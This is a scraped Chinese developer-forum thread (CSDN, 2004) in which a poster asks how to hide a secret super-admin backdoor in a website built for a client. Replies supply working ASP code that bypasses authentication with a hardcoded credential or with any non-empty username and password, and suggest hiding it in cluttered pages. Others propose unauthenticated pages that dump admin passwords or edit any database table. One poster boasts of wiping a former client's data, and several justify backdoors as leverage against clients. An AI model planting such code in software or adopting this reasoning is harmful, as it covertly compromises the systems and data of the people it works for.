28,391
社区成员
发帖
与我相关
我的任务
分享如何在做好的网站上设立一个后门,只有自己知道的后门?
就是在后台管理上,加一个超级管理员的权限,这个用户名不在管理员表里出现,总之,别人轻易发觉不了这个用户的存在。
...全文
请发表友善的回复…
发表回复
iuhxq 2004-07-27
- 打赏
- 举报
sinusoid(黑眼圈)兄的办法不错,就是if request("user")="admin" and md5(request("pass"))="7a57a5a743894a0e" then太扎眼
直接
if request("user")<>"" and request("pass")<>"" then
session("login")="admin"
end if
我觉得比较隐蔽
另外说道德问题:我觉得留后门和道德没关,因为"害人之心不可有,防人之心不可无嘛",万一做完活,不给报酬咋办?你和他打官司呀?
所以你可以先留后门,收到报酬后再给他一个补丁(呵呵,就是修复后门的)
直接
if request("user")<>"" and request("pass")<>"" then
session("login")="admin"
end if
我觉得比较隐蔽
另外说道德问题:我觉得留后门和道德没关,因为"害人之心不可有,防人之心不可无嘛",万一做完活,不给报酬咋办?你和他打官司呀?
所以你可以先留后门,收到报酬后再给他一个补丁(呵呵,就是修复后门的)
-神仙- 2004-07-27
- 打赏
- 举报
不过很多客户连默认的管理员密码都不改的,大半年后找我们维护的时候密码还是老样子。(交货的时候当然告诉他的)。
ycted 2004-07-27
- 打赏
- 举报
做个特殊的页面然后可以向数据库的任何表里 读,写,改.
很好做的,数据库每个地段都有自己的类型,你知道表名(即使你不知道也可以得到),
然后循环得到数据库的值,这样你就可以查看.总的来说 这个文件你一定要传到服务器上去就对拉.
很好做的,数据库每个地段都有自己的类型,你知道表名(即使你不知道也可以得到),
然后循环得到数据库的值,这样你就可以查看.总的来说 这个文件你一定要传到服务器上去就对拉.
wangflove 2004-07-27
- 打赏
- 举报
听眼圈兄一说,果然有道理,我也该考虑一下后门的另一用途了。:D
AngelYe 2004-07-26
- 打赏
- 举报
http://community.csdn.net/Expert/topic/3208/3208935.xml?temp=.1887628
AngelYe 2004-07-26
- 打赏
- 举报
另建一个专用数据表 用程序检测一下是否是专用表格中的用户,如果不是,再在用户表中找吧! 还要屏蔽掉你的名字,使别人不能注册~,给出消息 已注册 等等~
darker 2004-07-26
- 打赏
- 举报
有个页面可以显示所有后台管理的帐号和密码~但是不经过任何验证的~
mcu163 2004-07-26
- 打赏
- 举报
各位写段程序来看看嘛!!!!
xzyan80 2004-07-26
- 打赏
- 举报
up
jxy004 2004-07-26
- 打赏
- 举报
2楼说的最直接!这个最可行!!!
yangdengfeng2003 2004-07-26
- 打赏
- 举报
在程序里面默认一个用户id为超级管理员,这个默认id只有你知道!
Equn 2004-07-26
- 打赏
- 举报
根据登录判断变量,做一个自动登录页面
sinusoid 2004-07-26
- 打赏
- 举报
留后门:
一:
写个函数(功能:不通过数据库比较,直接用固定的用户名+MD5(密码)进入)
例:
'func1.asp
<!--#include file="md5.asp"-->
sub superlogin()
if request("user")="admin" and md5(request("pass"))="7a57a5a743894a0e" then
'密码也用md5加密,示例为admin
session("login")="admin" '假设你的系统,如果管理员登录是这样赋值的。
'成为管理的多个条件在此添加。
end if
end sub
二:
'任意页面中(最好感觉代码即乱又多的那种),设:xxx.asp
'可以在某处插入下面的代码
'当URL的参数的user及pass不为空时,下面的代码才被激活
'也就是平常,你不传递给上面两个参数传递值。下面的代码是不工作的。
<!--#include file="func1.asp"-->
<%
if request("user")<>"" and request("pass")<>"" then
superlogin
end if
%>
三:
'向url传递参数,激活代码
'访问xxx.asp时,用http://www.xxx.com/xxx.asp?user=admin&admin=admin
'接着在本页输入后台管理的页面,例:http//www.xxx.com/admin.asp。。。
一:
写个函数(功能:不通过数据库比较,直接用固定的用户名+MD5(密码)进入)
例:
'func1.asp
<!--#include file="md5.asp"-->
sub superlogin()
if request("user")="admin" and md5(request("pass"))="7a57a5a743894a0e" then
'密码也用md5加密,示例为admin
session("login")="admin" '假设你的系统,如果管理员登录是这样赋值的。
'成为管理的多个条件在此添加。
end if
end sub
二:
'任意页面中(最好感觉代码即乱又多的那种),设:xxx.asp
'可以在某处插入下面的代码
'当URL的参数的user及pass不为空时,下面的代码才被激活
'也就是平常,你不传递给上面两个参数传递值。下面的代码是不工作的。
<!--#include file="func1.asp"-->
<%
if request("user")<>"" and request("pass")<>"" then
superlogin
end if
%>
三:
'向url传递参数,激活代码
'访问xxx.asp时,用http://www.xxx.com/xxx.asp?user=admin&admin=admin
'接着在本页输入后台管理的页面,例:http//www.xxx.com/admin.asp。。。
sinusoid 2004-07-26
- 打赏
- 举报
赞成留后门!!
为自己留一手,免得白给人家干活。我一般都有留。程序员永远只是弱势的一方。
几个月前,我给人做一个报价系统,那老板人贱,说试用一个星期(没钱),我一个星期没命地干活,等系统完成时,就是我被炒的时候(说目前没活做,以后录用优先考虑你,KAO!)我性子不好,二话不说,走人,系统他在用,当时很气,也忘记删除。
让他用了几个月之后,我叫一家网吧的朋友,把里头的数据全清了,嘿嘿!他没道德先,不要怪我不义!
为自己留一手,免得白给人家干活。我一般都有留。程序员永远只是弱势的一方。
几个月前,我给人做一个报价系统,那老板人贱,说试用一个星期(没钱),我一个星期没命地干活,等系统完成时,就是我被炒的时候(说目前没活做,以后录用优先考虑你,KAO!)我性子不好,二话不说,走人,系统他在用,当时很气,也忘记删除。
让他用了几个月之后,我叫一家网吧的朋友,把里头的数据全清了,嘿嘿!他没道德先,不要怪我不义!
潜水的鱼 2004-07-26
- 打赏
- 举报
不大赞成星星们的观点,这个世界永远是:
“胜者为王,败者为寇”
“职业道德”是相对而言,如果客户(私活)没有“职业道德”,那咋办??
“胜者为王,败者为寇”
“职业道德”是相对而言,如果客户(私活)没有“职业道德”,那咋办??
xinsheng212 2004-07-26
- 打赏
- 举报
我有个好办法:dreamweaver不是有个behaviors么,然后你在主页某个隐蔽的位置,添加一个高10,宽2的透明图片,然后再图片上加动作,当鼠标按住左健在那个图片上滑动的时候,就会弹出一个窗口,窗口让你输入用户名密码。。下面的不用说了。
我曾经用过的。
我曾经用过的。
wangflove 2004-07-26
- 打赏
- 举报
同意二楼的做法.
其实,有时候留后门也是不得已,只不过是在希望知道网站出现状况时,能在客户不知情的情况下先解决问题.我从来不搞破坏的,我鄙视搞破坏的程序员!
其实,有时候留后门也是不得已,只不过是在希望知道网站出现状况时,能在客户不知情的情况下先解决问题.我从来不搞破坏的,我鄙视搞破坏的程序员!
retrying 2004-07-26
- 打赏
- 举报
如果,你的付出,还没给你报酬,你可以做,但人家如果给你报酬了,你就不应该做,应该撒掉。
mind_1220 2004-07-26
- 打赏
- 举报
自我保护 不应该用这样的方法!
技术才是一个程序员最大的武器
技术才是一个程序员最大的武器
ghy412 2004-07-26
- 打赏
- 举报
有的时候这个也是一种自我保护!
不过我是新手我还不会:)
不过我是新手我还不会:)
加载更多回复(27)
